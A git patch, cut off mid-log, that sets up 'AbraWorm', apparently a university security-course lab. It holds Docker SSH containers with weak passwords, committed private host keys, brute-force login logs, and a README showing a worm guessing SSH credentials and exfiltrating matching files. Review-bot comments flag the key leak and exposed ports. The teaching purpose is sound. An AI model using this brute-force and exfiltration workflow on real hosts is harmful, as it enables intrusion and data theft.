From 29a172eaecaa0e0cb3baf4bc5324a77cc4ec949e Mon Sep 17 00:00:00 2001 
From: Matteo Zoia
Date: Tue, 7 Nov 2023 10:40:28 +0100
Subject: [PATCH] init
---
.gitignore | 4 +
.gitlab-ci.yml | 28 ++
README.md | 63 +++
attacker/config/.bash_history | 2 +
attacker/config/.gitkeep | 0
attacker/config/.ssh/authorized_keys | 0
attacker/config/logs/loginfo.txt | 1 +
attacker/config/logs/openssh/current | 23 +
attacker/config/logs/openssh/lock | 0
attacker/config/logs/openssh/state | 0
.../config/ssh_host_keys/ssh_host_ecdsa_key | 9 +
.../ssh_host_keys/ssh_host_ecdsa_key.pub | 1 +
.../config/ssh_host_keys/ssh_host_ed25519_key | 7 +
.../ssh_host_keys/ssh_host_ed25519_key.pub | 1 +
.../config/ssh_host_keys/ssh_host_rsa_key | 38 ++
.../config/ssh_host_keys/ssh_host_rsa_key.pub | 1 +
attacker/config/ssh_host_keys/sshd_config | 117 +++++
attacker/config/sshd.pid | 1 +
docker-compose.yaml | 40 ++
user/config/.bash_history | 3 +
user/config/.ssh/authorized_keys | 0
user/config/logs/loginfo.txt | 1 +
user/config/logs/openssh/current | 428 ++++++++++++++++++
user/config/logs/openssh/lock | 0
user/config/logs/openssh/state | 0
user/config/ssh_host_keys/ssh_host_ecdsa_key | 9 +
.../ssh_host_keys/ssh_host_ecdsa_key.pub | 1 +
.../config/ssh_host_keys/ssh_host_ed25519_key | 7 +
.../ssh_host_keys/ssh_host_ed25519_key.pub | 1 +
user/config/ssh_host_keys/ssh_host_rsa_key | 38 ++
.../config/ssh_host_keys/ssh_host_rsa_key.pub | 1 +
user/config/ssh_host_keys/sshd_config | 117 +++++
user/config/sshd.pid | 1 +
user/config/test.txt | 2 +
user/init-scripts/disable-maxauth.sh | 4 +
worm/AbraWorm.py | 285 ++++++++++++
36 files changed, 1234 insertions(+)
create mode 100644 .gitignore
create mode 100644 .gitlab-ci.yml
create mode 100644 README.md
create mode 100644 attacker/config/.bash_history
create mode 100644 attacker/config/.gitkeep
create mode 100644 attacker/config/.ssh/authorized_keys
create mode 100644 attacker/config/logs/loginfo.txt
create mode 100644 attacker/config/logs/openssh/current
create mode 100644 attacker/config/logs/openssh/lock
create mode 100644 attacker/config/logs/openssh/state
create mode 100644 attacker/config/ssh_host_keys/ssh_host_ecdsa_key
create mode 100644 attacker/config/ssh_host_keys/ssh_host_ecdsa_key.pub
create mode 100644 attacker/config/ssh_host_keys/ssh_host_ed25519_key
create mode 100644 attacker/config/ssh_host_keys/ssh_host_ed25519_key.pub
create mode 100644 attacker/config/ssh_host_keys/ssh_host_rsa_key
create mode 100644 attacker/config/ssh_host_keys/ssh_host_rsa_key.pub
create mode 100644 attacker/config/ssh_host_keys/sshd_config
create mode 100644 attacker/config/sshd.pid
create mode 100644 docker-compose.yaml
create mode 100644 user/config/.bash_history
create mode 100644 user/config/.ssh/authorized_keys
create mode 100644 user/config/logs/loginfo.txt
create mode 100644 user/config/logs/openssh/current
create mode 100644 user/config/logs/openssh/lock
create mode 100644 user/config/logs/openssh/state
create mode 100644 user/config/ssh_host_keys/ssh_host_ecdsa_key
create mode 100644 user/config/ssh_host_keys/ssh_host_ecdsa_key.pub
create mode 100644 user/config/ssh_host_keys/ssh_host_ed25519_key
create mode 100644 user/config/ssh_host_keys/ssh_host_ed25519_key.pub
create mode 100644 user/config/ssh_host_keys/ssh_host_rsa_key
create mode 100644 user/config/ssh_host_keys/ssh_host_rsa_key.pub
create mode 100644 user/config/ssh_host_keys/sshd_config
create mode 100644 user/config/sshd.pid
create mode 100644 user/config/test.txt
create mode 100755 user/init-scripts/disable-maxauth.sh
create mode 100644 worm/AbraWorm.py
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..b31b6f0
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,4 @@
+.DS_Store
+*/.DS_Store
+
+worm/.venv/
\ No newline at end of file
diff --git a/.gitlab-ci.yml b/.gitlab-ci.yml
new file mode 100644
index 0000000..d1ddb37
--- /dev/null
+++ b/.gitlab-ci.yml
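Review bot: The ignore list does not cover the two directories that `docker-compose.yaml` mounts as the containers' `/config` volume, so the rest of this commit checks in runtime state the containers wrote there: the private host keys `attacker/config/ssh_host_keys/ssh_host_rsa_key`, `ssh_host_ecdsa_key` and `ssh_host_ed25519_key` and their `user/config/ssh_host_keys/` counterparts, the `logs/openssh/current` files, `sshd.pid`, `.bash_history` and the image's default `sshd_config`. Private keys that have been pushed to a repository should be treated as disclosed even in a lab; remove them from the tree and from history and let the image regenerate them on first start. Ignoring the volumes while keeping the seeded fixture is a few lines, e.g. `attacker/config/*`, `!attacker/config/.gitkeep`, `user/config/*` and `!user/config/test.txt`. The same point applies to every `attacker/config/...` and `user/config/...` hunk further down in this patch.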
@@ -0,0 +1,28 @@
+image:
+ name: docker:latest
+
+services:
+ - docker:dind
+
+variables:
+ DOCKER_HOST: tcp://docker:2375
+ DOCKER_DRIVER: overlay2
+
+stages:
+ - test_images
+
+test_images:
+ stage: test_images
+ image: docker:latest
+ script:
+ - pwd
+ - ls -la
+ - docker-compose up -d
+ - docker ps
+ - apk update
+ - apk add python3
+ - python3 -m py_compile worm/AbraWorm.py
+ artifacts:
+ paths:
+ - worm/AbraWorm.py
+ - docker-compose.yaml
\ No newline at end of file
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..98b66fa
--- /dev/null
+++ b/README.md
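Review bot: `docker-compose up -d` in the `script:` list returns as soon as the containers are created and nothing afterwards asserts that they stayed up — `docker ps` only prints — so a container that exits right after start does not fail the job. The stack is also never torn down; an `after_script:` with `- docker-compose down -v` is the minimal cleanup. `DOCKER_HOST: tcp://docker:2375` selects the daemon's plain-TCP socket, and as far as I know current `docker:dind` images enable TLS by default and only serve the unencrypted port when `DOCKER_TLS_CERTDIR` is set to an empty string, so this job either cannot connect or has to opt out of TLS explicitly; prefer `DOCKER_HOST: tcp://docker:2376` together with `DOCKER_TLS_CERTDIR: "/certs"` and `DOCKER_TLS_VERIFY: 1`. Listing the checked-in sources `worm/AbraWorm.py` and `docker-compose.yaml` under `artifacts:` just re-uploads files the repository already holds.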
@@ -0,0 +1,63 @@
+# AbraWorm
+_Corso di Sicurezza e Privatezza @ Unimi_
+
+## Passaggi per l'utilizzo
+_Testato su ubuntu_
+
+* Installazione di docker e docker-compose https://docs.docker.com/engine/install/ubuntu/
+
+* Con il comando `docker-compose up --force-recreate` vengono scaricate le immagini di openssh-server
+(immagini minimali da circa 12MB). Vengono creati 2 container di nome _openssh-server-attacker_ e
+_openssh-server-user_. Entrambi i container espongono la porta 2222 che viene rimappata sulla porta
+dell'host 22 per openssh-server-user e 12345 per openssh-server-attacker. Ora la macchina dello
+studente avrá due porte esposte 22 e 12345, si puó vedere con `netstat -tulpn | grep LISTEN`
+
+```
+teozoia@teozoia-blade:~/Desktop/abraworm/abraworm/worm$ netstat -tulpn | grep LISTEN
+tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
+tcp 0 0 0.0.0.0:12345 0.0.0.0:* LISTEN -
+...
+```
+
+* Come dichiarato all'interno del file _docker-compose.yaml_ al rispettivo container verrá montata la cartella
+_user/config_ e _attacker/config_; da notare che in _user/config_ é presente il file _text.txt_ il quale contiene
+la parola abracadabra.
+
+* Per testare il funzionamento dei due container é possibile collegarsi al container user con
+`ssh user@127.0.0.1` (password: password) e attacker con `ssh seed@127.0.0.1 -p 12345` (password: dees).
+
+* É possibile eseguire il worm sulla propria macchina `python3 AbraWorm.py`. Se si vuole velocizzare il processo
+é possibile togliere il `while` e fare in modo che le funzioni `get_password_list()` e `get_user_list()`
+ritornino una lista fissata non lunga. Per usare il worm in modo verboso é necessario che `DEBUG=1`.
+
+```
+teozoia@teozoia-blade:~/Desktop/abraworm/abraworm/worm$ python3 AbraWorm.py
+user@127.0.0.1 -> adjfhfad
+Exception catched: Authentication failed.
+user@127.0.0.1 -> dhf931f
+Exception catched: Authentication failed.
+matteo@127.0.0.1 -> idhf
+Exception catched: Authentication failed.
+user@127.0.0.1 -> password
+Connected user@127.0.0.1 -> password
+[user@127.0.0.1] executing: ls
+ stdout:['AbraWorm.py\n', 'logs\n', 'ssh_host_keys\n', 'sshd.pid\n', 'test.txt\n']
+Target user@127.0.0.1 already infected
+[user@127.0.0.1] executing: grep -ls abracadabra *
+ stdout:['AbraWorm.py\n', 'test.txt\n']
+Files of interest at the target: ['AbraWorm.py', 'test.txt']
+Will now try to exfiltrate the files
+Connected to exhiltration host
+```
+
+## Docker install
+https://docs.docker.com/engine/install/ubuntu/
+
+* `sudo apt-get remove docker docker-engine docker.io containerd runc`
+* `sudo apt-get update`
+* `sudo apt-get install ca-certificates curl gnupg lsb-release`
+* `sudo mkdir -p /etc/apt/keyrings`
+* `curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo gpg --dearmor -o /etc/apt/keyrings/docker.gpg`
+* `echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.gpg] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null`
+* `sudo apt-get update`
+* `sudo apt-get install docker-ce docker-ce-cli containerd.io docker-compose-plugin`
diff --git a/attacker/config/.bash_history b/attacker/config/.bash_history
new file mode 100644
index 0000000..0eee24b
--- /dev/null
+++ b/attacker/config/.bash_history
@@ -0,0 +1,2 @@
+ls
+exit
diff --git a/attacker/config/.gitkeep b/attacker/config/.gitkeep
new file mode 100644
index 0000000..e69de29
diff --git a/attacker/config/.ssh/authorized_keys b/attacker/config/.ssh/authorized_keys
new file mode 100644
index 0000000..e69de29
diff --git a/attacker/config/logs/loginfo.txt b/attacker/config/logs/loginfo.txt
new file mode 100644
index 0000000..1632abe
--- /dev/null
+++ b/attacker/config/logs/loginfo.txt
@@ -0,0 +1 @@
+The current log file is named "current". The rotated log files are gzipped, named with a TAI64N timestamp and a ".s" extension
diff --git a/attacker/config/logs/openssh/current b/attacker/config/logs/openssh/current
new file mode 100644
index 0000000..8a4653c
--- /dev/null
+++ b/attacker/config/logs/openssh/current
@@ -0,0 +1,23 @@ +2023-11-06 22:42:09.880207882 Server listening on 0.0.0.0 port 2222. +2023-11-06 22:42:09.881994382 Server listening on :: port 2222. +2023-11-06 22:42:10.940105549 kex_exchange_identification: Connection closed by remote host +2023-11-06 22:42:10.940111716 Connection closed by 127.0.0.1 port 45942 +2023-11-06 22:45:26.231854167 Accepted password for seed from 172.18.0.1 port 61352 ssh2 +2023-11-06 22:45:26.262239876 Attempt to write login records by non-root user (aborting) +2023-11-06 22:45:31.846185795 Attempt to write login records by non-root user (aborting) +2023-11-06 22:45:31.847341337 Received disconnect from 172.18.0.1 port 61352:11: disconnected by user +2023-11-06 22:45:31.847342962 Disconnected from user seed 172.18.0.1 port 61352 +2023-11-06 22:50:37.233855881 Accepted password for seed from 172.18.0.1 port 64628 ssh2 +2023-11-06 22:51:37.251898047 Received signal 15; terminating. +2023-11-07 09:12:43.560274049 Server listening on 0.0.0.0 port 2222. +2023-11-07 09:12:43.560420424 Server listening on :: port 2222. +2023-11-07 09:12:44.594276967 kex_exchange_identification: Connection closed by remote host +2023-11-07 09:12:44.596037883 Connection closed by 127.0.0.1 port 45730 +2023-11-07 09:15:28.116071792 Accepted password for seed from 172.18.0.1 port 63686 ssh2 +2023-11-07 09:18:09.807334298 Accepted password for seed from 172.18.0.1 port 56706 ssh2 +2023-11-07 09:19:40.980847923 Received signal 15; terminating. +2023-11-07 10:26:50.142897424 Server listening on 0.0.0.0 port 2222. +2023-11-07 10:26:50.143966716 Server listening on :: port 2222. +2023-11-07 10:26:51.193576550 kex_exchange_identification: Connection closed by remote host +2023-11-07 10:26:51.193582467 Connection closed by 127.0.0.1 port 51650 +2023-11-07 10:27:15.669542339 Accepted password for seed from 172.18.0.1 port 63226 ssh2 diff --git a/attacker/config/logs/openssh/lock b/attacker/config/logs/openssh/lock new file mode 100644 index 0000000..e69de29 
diff --git a/attacker/config/logs/openssh/state b/attacker/config/logs/openssh/state new file mode 100644 index 0000000..e69de29 diff --git a/attacker/config/ssh_host_keys/ssh_host_ecdsa_key b/attacker/config/ssh_host_keys/ssh_host_ecdsa_key new file mode 100644 index 0000000..365a1c2 --- /dev/null +++ b/attacker/config/ssh_host_keys/ssh_host_ecdsa_key @@ -0,0 +1,9 @@ +-----BEGIN OPENSSH PRIVATE KEY----- +b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS +1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQRY9WI38IP7LqpZj4w3gpOATSr43ajL +DLZL8KBPyg+HUqjLg6gOTRb9lgSy5UIn6zXeVUyW2s0fF5GAgx6zVNd7AAAAuCLGBKUixg +SlAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFj1Yjfwg/suqlmP +jDeCk4BNKvjdqMsMtkvwoE/KD4dSqMuDqA5NFv2WBLLlQifrNd5VTJbazR8XkYCDHrNU13 +sAAAAhALY+XXKnb6mrNV3gY1OKXPCYNLbmOBVwfTlqcCr3lf37AAAAHHJvb3RAb3BlbnNz +aC1zZXJ2ZXItYXR0YWNrZXIBAgM= +-----END OPENSSH PRIVATE KEY----- diff --git a/attacker/config/ssh_host_keys/ssh_host_ecdsa_key.pub b/attacker/config/ssh_host_keys/ssh_host_ecdsa_key.pub new file mode 100644 index 0000000..b1ba343 --- /dev/null +++ b/attacker/config/ssh_host_keys/ssh_host_ecdsa_key.pub @@ -0,0 +1 @@ +ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFj1Yjfwg/suqlmPjDeCk4BNKvjdqMsMtkvwoE/KD4dSqMuDqA5NFv2WBLLlQifrNd5VTJbazR8XkYCDHrNU13s= root@openssh-server-attacker diff --git a/attacker/config/ssh_host_keys/ssh_host_ed25519_key b/attacker/config/ssh_host_keys/ssh_host_ed25519_key new file mode 100644 index 0000000..d1ed26f --- /dev/null +++ b/attacker/config/ssh_host_keys/ssh_host_ed25519_key 
@@ -0,0 +1,7 @@ +-----BEGIN OPENSSH PRIVATE KEY----- +b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW +QyNTUxOQAAACAOuVKoNfSwDjmKuedxw4yR/+Ns24N0ODxqY70K8zfH/wAAAKD6rigZ+q4o +GQAAAAtzc2gtZWQyNTUxOQAAACAOuVKoNfSwDjmKuedxw4yR/+Ns24N0ODxqY70K8zfH/w +AAAECywErKvj8VoVo5QRNYtxud3cQkqYyda/yI0mT9de1ciA65Uqg19LAOOYq553HDjJH/ +42zbg3Q4PGpjvQrzN8f/AAAAHHJvb3RAb3BlbnNzaC1zZXJ2ZXItYXR0YWNrZXIB +-----END OPENSSH PRIVATE KEY----- diff --git a/attacker/config/ssh_host_keys/ssh_host_ed25519_key.pub b/attacker/config/ssh_host_keys/ssh_host_ed25519_key.pub new file mode 100644 index 0000000..68b0c59 --- /dev/null +++ b/attacker/config/ssh_host_keys/ssh_host_ed25519_key.pub @@ -0,0 +1 @@ +ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIA65Uqg19LAOOYq553HDjJH/42zbg3Q4PGpjvQrzN8f/ root@openssh-server-attacker diff --git a/attacker/config/ssh_host_keys/ssh_host_rsa_key b/attacker/config/ssh_host_keys/ssh_host_rsa_key new file mode 100644 index 0000000..7d7cfa5 --- /dev/null +++ b/attacker/config/ssh_host_keys/ssh_host_rsa_key 
@@ -0,0 +1,38 @@ +-----BEGIN OPENSSH PRIVATE KEY----- +b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn +NhAAAAAwEAAQAAAYEAyR7GkOsvzhzPKZnsxuU49zCHKA1jLrSbpn+716EoXqaEQzt9Pq+F +n9MrjyGILQBR+C6Webvf6G4vd8vSImO1qQAqDRDlsDhlBCNfgT70IdiEKDRNSZ3Rn++Ph+ +40FXeMHoO/7ymMbDtUg/MqSxjvky9Q5wh9eajfc6+t7RM1gu/pdOj05yTb/a1zkiOD48ie +Nq1Y+xl6mH5ucBV1Zxl3KvHTnqCBz1sJEsJvWK4io7cpDRXLuZRKYAhqs+sHw8hJxrSGaE +Gkw87Om5Ic8nKxV0rx8YYfi5UTQxoU4AqPCreNzOMBSHuqvuy1VBA2m+glp/oRoYsan7Bt +BkhkM0zOVz4NW8l26u6aHMaHioLkCWYuqRssAYZfpXxL2Nq4i0CcBWvN8XsFT2lGr0NEiH +ORzqw1mP/V6K/iE8kxeYayupHUwnN6ejI5LZVkhZB1Ca54+52gy44rSoU6nAlT7gr7aEZZ +rU20zfiJm4vfhYnpdjMnhU3AkgMwj7tWvrJJa/y9AAAFmJqfLauany2rAAAAB3NzaC1yc2 +EAAAGBAMkexpDrL84czymZ7MblOPcwhygNYy60m6Z/u9ehKF6mhEM7fT6vhZ/TK48hiC0A +Ufgulnm73+huL3fL0iJjtakAKg0Q5bA4ZQQjX4E+9CHYhCg0TUmd0Z/vj4fuNBV3jB6Dv+ +8pjGw7VIPzKksY75MvUOcIfXmo33Ovre0TNYLv6XTo9Ock2/2tc5Ijg+PInjatWPsZeph+ +bnAVdWcZdyrx056ggc9bCRLCb1iuIqO3KQ0Vy7mUSmAIarPrB8PISca0hmhBpMPOzpuSHP +JysVdK8fGGH4uVE0MaFOAKjwq3jczjAUh7qr7stVQQNpvoJaf6EaGLGp+wbQZIZDNMzlc+ +DVvJdurumhzGh4qC5AlmLqkbLAGGX6V8S9jauItAnAVrzfF7BU9pRq9DRIhzkc6sNZj/1e +iv4hPJMXmGsrqR1MJzenoyOS2VZIWQdQmuePudoMuOK0qFOpwJU+4K+2hGWa1NtM34iZuL +34WJ6XYzJ4VNwJIDMI+7Vr6ySWv8vQAAAAMBAAEAAAGABPT2eWdmhfq1S2XxDUTkhskiJ6 +VO0r2eUXf3+fxNmamafGq4r0UVssb6XZx6tfs6Sfbh/A2amuiuUFJMc08IUOpBXxGRy6pU +KQozJiUWUMg8l54UYpJacontvHCtRXMtF6pxHlSkkp1Su67QVcn/S54grRULPKaiHUCQ9Z +Uh3kCJ/TjpolHI/0NZZBpue3x8E8ZpeUTbPettzuLkgh5BTuRnbhMwJ9trSZRTuLiP/395 +6knle8UxIRVMBfOuvQ9QYPjMUNeuSgTj2Gs8B7F9//QAnHQgeV5JAHQq8yMyeoNPcaOcas +RgoaeYJcB41MYUfoJT59R98UGHZWBzBaYz6XVeq8DyEezN/wDeHKJSSPZQu9wX+Es7g0op +mZNAjVfJ9b0we4w4WsfXF/AjBiCXaLVtX8VzErZzZFJ6re2i/rM4Y6JDaceb0CCKtArtAc +OMDjpy0d/y+F/g099wIrTRPQi1YJ7SmwYqf7AFN0vDbEgQ4GOF/oH/+mZBZNwmHPZJAAAA +wQDJR3jzXS9We/hCg7hqVkydG3VWE22mBfcBsuNiHaXMTFzicDMJBFYQpdi7C5B1a2Ve5Y +OmgRJif46IZYIwmt2exG3HyD1jKGFCYRl74pO6o79FvQVlt8iXL+Nw7rf997AUFaWjqigP +KpdvvyjjsBPMXwzxDqWkihuMazcqPbAuFJ99l0VHzAIx2XfQBOOdT+FTZ3mnAv9dQcQioC 
+VxyoFptEL1AZmbg94pZ8OiqfULsqhvMTonC+gCO/wOwqyYGA0AAADBAPKm9lpqto6kggoB +fd6Ewox3qXGdy9TJefgtXts1w2eTeNCCh0kIWXsnpQbnrjAZiidsXLtBGj0vSADIcoUyEE +N5UqPjom5LAKvOw/Cva69gp2Qu4XkqqfctkX45Qmv5Sln9vi6+81u5WkeVrmwW8tFJbAf5 +irZ2UdxaAwwEV9eazRqUM/38kfh3AqyVyWqxtKjUsc4NEO13fftJawtCa3idWaJnXyLRdl +Rl8ehDUWaMZrx/5ECt+7/BnJH7y4uN1QAAAMEA1C71WJuEBxh9knatRirDGPXS3ivGlHsb +VcEaIsMvSzZ5PQgmQWokITkR1NiP1MfeaQGnuE3DFt61YXK56nQKpEQiY/WMZQtDkgjSsl +zkrH/Z5MlzUmZwOCpfQ6IxreeVQs2immgWEo/PRzDcelPl/C784rbWAdeZrsHzwwD16kLQ +NSQr0AHkRI4Gdw1I+JCgYcLxZUWxq2k7f591Km2ZHMxlnyyrChWZJTp3xFi+9pJ7Iq75Rt +V3UI1429Y7xN9JAAAAHHJvb3RAb3BlbnNzaC1zZXJ2ZXItYXR0YWNrZXIBAgMEBQY= +-----END OPENSSH PRIVATE KEY----- diff --git a/attacker/config/ssh_host_keys/ssh_host_rsa_key.pub b/attacker/config/ssh_host_keys/ssh_host_rsa_key.pub new file mode 100644 index 0000000..412f8f4 --- /dev/null +++ b/attacker/config/ssh_host_keys/ssh_host_rsa_key.pub @@ -0,0 +1 @@ +ssh-rsa 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 root@openssh-server-attacker diff --git a/attacker/config/ssh_host_keys/sshd_config b/attacker/config/ssh_host_keys/sshd_config new file mode 100644 index 0000000..747fa79 --- /dev/null +++ b/attacker/config/ssh_host_keys/sshd_config 
@@ -0,0 +1,117 @@
+# $OpenBSD: sshd_config,v 1.104 2021/07/02 05:11:21 dtucker Exp $
+
+# This is the sshd server system-wide configuration file. See
+# sshd_config(5) for more information.
+
+# This sshd was compiled with PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
+
+# The strategy used for options in the default sshd_config shipped with
+# OpenSSH is to specify options with their default value where
+# possible, but leave them commented. Uncommented options override the
+# default value.
+
+Port 2222
+#AddressFamily any
+#ListenAddress 0.0.0.0
+#ListenAddress ::
+
+#HostKey /etc/ssh/ssh_host_rsa_key
+#HostKey /etc/ssh/ssh_host_ecdsa_key
+#HostKey /etc/ssh/ssh_host_ed25519_key
+
+# Ciphers and keying
+#RekeyLimit default none
+
+# Logging
+#SyslogFacility AUTH
+#LogLevel INFO
+
+# Authentication:
+
+#LoginGraceTime 2m
+#PermitRootLogin prohibit-password
+#StrictModes yes
+#MaxAuthTries 6
+#MaxSessions 10
+
+#PubkeyAuthentication yes
+
+# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
+# but this is overridden so installations will only check .ssh/authorized_keys
+AuthorizedKeysFile .ssh/authorized_keys
+
+#AuthorizedPrincipalsFile none
+
+#AuthorizedKeysCommand none
+#AuthorizedKeysCommandUser nobody
+
+# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
+#HostbasedAuthentication no
+# Change to yes if you don't trust ~/.ssh/known_hosts for
+# HostbasedAuthentication
+#IgnoreUserKnownHosts no
+# Don't read the user's ~/.rhosts and ~/.shosts files
+#IgnoreRhosts yes
+
+# To disable tunneled clear text passwords, change to no here!
+PasswordAuthentication yes
+#PermitEmptyPasswords no
+
+# Change to no to disable s/key passwords
+#KbdInteractiveAuthentication yes
+
+# Kerberos options
+#KerberosAuthentication no
+#KerberosOrLocalPasswd yes
+#KerberosTicketCleanup yes
+#KerberosGetAFSToken no
+
+# GSSAPI options
+#GSSAPIAuthentication no
+#GSSAPICleanupCredentials yes
+
+# Set this to 'yes' to enable PAM authentication, account processing,
+# and session processing. If this is enabled, PAM authentication will
+# be allowed through the KbdInteractiveAuthentication and
+# PasswordAuthentication. Depending on your PAM configuration,
+# PAM authentication via KbdInteractiveAuthentication may bypass
+# the setting of "PermitRootLogin prohibit-password".
+# If you just want the PAM account and session checks to run without
+# PAM authentication, then enable this but set PasswordAuthentication
+# and KbdInteractiveAuthentication to 'no'.
+#UsePAM no
+
+#AllowAgentForwarding yes
+# Feel free to re-enable these if your use case requires them.
+AllowTcpForwarding no
+GatewayPorts no
+X11Forwarding no
+#X11DisplayOffset 10
+#X11UseLocalhost yes
+#PermitTTY yes
+#PrintMotd yes
+#PrintLastLog yes
+#TCPKeepAlive yes
+#PermitUserEnvironment no
+#Compression delayed
+#ClientAliveInterval 0
+#ClientAliveCountMax 3
+#UseDNS no
+PidFile /config/sshd.pid
+#MaxStartups 10:30:100
+#PermitTunnel no
+#ChrootDirectory none
+#VersionAddendum none
+
+# no default banner path
+#Banner none
+
+# override default of no subsystems
+Subsystem sftp internal-sftp
+
+# Example of overriding settings on a per-user basis
+#Match User anoncvs
+# X11Forwarding no
+# AllowTcpForwarding no
+# PermitTTY no
+# ForceCommand cvs server
diff --git a/attacker/config/sshd.pid b/attacker/config/sshd.pid
new file mode 100644
index 0000000..4e9bdff
--- /dev/null
+++ b/attacker/config/sshd.pid
@@ -0,0 +1 @@
+164
diff --git a/docker-compose.yaml b/docker-compose.yaml
new file mode 100644
index 0000000..1bd9c65
--- /dev/null
+++ b/docker-compose.yaml
@@ -0,0 +1,40 @@
+version: "2.1"
+services:
+ openssh-server-attacker:
+ image: lscr.io/linuxserver/openssh-server:latest
+ container_name: openssh-server-attacker
+ hostname: openssh-server-attacker
+ environment:
+ - PUID=1000
+ - PGID=1000
+ - TZ=Europe/Rome
+ - SUDO_ACCESS=false
+ - PASSWORD_ACCESS=true
+ - USER_PASSWORD=dees
+ - USER_NAME=seed
+ - PORT=22
+ volumes:
+ - ./attacker/config:/config
+ ports:
+ - "12345:2222"
+ restart: unless-stopped
+
+ openssh-server-user:
+ image: lscr.io/linuxserver/openssh-server:latest
+ container_name: openssh-server-user
+ hostname: openssh-server-user
+ environment:
+ - PUID=1000
+ - PGID=1000
+ - TZ=Europe/Rome
+ - SUDO_ACCESS=true
+ - PASSWORD_ACCESS=true
+ - USER_PASSWORD=password
+ - USER_NAME=user
+ - PORT=22
+ volumes:
+ - ./user/config:/config
+ - ./user/init-scripts:/custom-cont-init.d:ro
+ ports:
+ - "22:2222"
+ restart: unless-stopped
diff --git a/user/config/.bash_history b/user/config/.bash_history
new file mode 100644
index 0000000..9f4c330
--- /dev/null
+++ b/user/config/.bash_history
@@ -0,0 +1,3 @@
+ls
+cat test.txt
+exit
diff --git a/user/config/.ssh/authorized_keys b/user/config/.ssh/authorized_keys
new file mode 100644
index 0000000..e69de29
diff --git a/user/config/logs/loginfo.txt b/user/config/logs/loginfo.txt
new file mode 100644
index 0000000..1632abe
--- /dev/null
+++ b/user/config/logs/loginfo.txt
@@ -0,0 +1 @@
+The current log file is named "current". The rotated log files are gzipped, named with a TAI64N timestamp and a ".s" extension
diff --git a/user/config/logs/openssh/current b/user/config/logs/openssh/current
new file mode 100644
index 0000000..c684eed
--- /dev/null
+++ b/user/config/logs/openssh/current
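Review bot: The `ports:` entries `"22:2222"` and `"12345:2222"` publish on every host interface, so the user container — configured with `PASSWORD_ACCESS=true`, `USER_PASSWORD=password` and `SUDO_ACCESS=true`, and kept alive across reboots by `restart: unless-stopped` — is reachable from any network the student's machine is attached to, not only from the worm running locally. The README in this same patch only ever connects to `127.0.0.1`, so binding to loopback costs nothing: `- "127.0.0.1:22:2222"` and `- "127.0.0.1:12345:2222"`. Publishing on host port 22 will also collide with a host sshd if one is listening; that is a usability point rather than a defect, but a one-line comment next to the mapping would save the next student a confusing failure.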
@@ -0,0 +1,428 @@ +2023-11-06 22:42:09.909313882 Server listening on 0.0.0.0 port 2222. +2023-11-06 22:42:09.909556590 Server listening on :: port 2222. +2023-11-06 22:42:10.943821799 kex_exchange_identification: Connection closed by remote host +2023-11-06 22:42:10.943824758 Connection closed by 127.0.0.1 port 45944 +2023-11-06 22:45:00.956156086 Accepted password for user from 172.18.0.1 port 55052 ssh2 +2023-11-06 22:45:00.980113919 Attempt to write login records by non-root user (aborting) +2023-11-06 22:45:07.549622381 Attempt to write login records by non-root user (aborting) +2023-11-06 22:45:07.551244798 Received disconnect from 172.18.0.1 port 55052:11: disconnected by user +2023-11-06 22:45:07.551246923 Disconnected from user user 172.18.0.1 port 55052 +2023-11-06 22:47:28.575557168 Invalid user admin from 172.18.0.1 port 55098 +2023-11-06 22:47:29.632256669 Could not get shadow information for NOUSER +2023-11-06 22:47:29.644074210 Failed password for invalid user admin from 172.18.0.1 port 55098 ssh2 +2023-11-06 22:47:29.700889169 Invalid user account from 172.18.0.1 port 56802 +2023-11-06 22:47:30.731651586 Could not get shadow information for NOUSER +2023-11-06 22:47:30.742260336 Failed password for invalid user account from 172.18.0.1 port 56802 ssh2 +2023-11-06 22:47:30.791357503 Invalid user vagrant from 172.18.0.1 port 56804 +2023-11-06 22:47:31.819007795 Could not get shadow information for NOUSER +2023-11-06 22:47:31.839216003 Failed password for invalid user vagrant from 172.18.0.1 port 56804 ssh2 +2023-11-06 22:47:31.890497045 Invalid user kali from 172.18.0.1 port 56806 +2023-11-06 22:47:32.925557170 Could not get shadow information for NOUSER +2023-11-06 22:47:32.936197837 Failed password for invalid user kali from 172.18.0.1 port 56806 ssh2 +2023-11-06 22:47:34.032862379 Failed password for user from 172.18.0.1 port 56808 ssh2 +2023-11-06 22:47:34.086105088 Invalid user adaliah from 172.18.0.1 port 56810 +2023-11-06 22:47:35.111440838 Could 
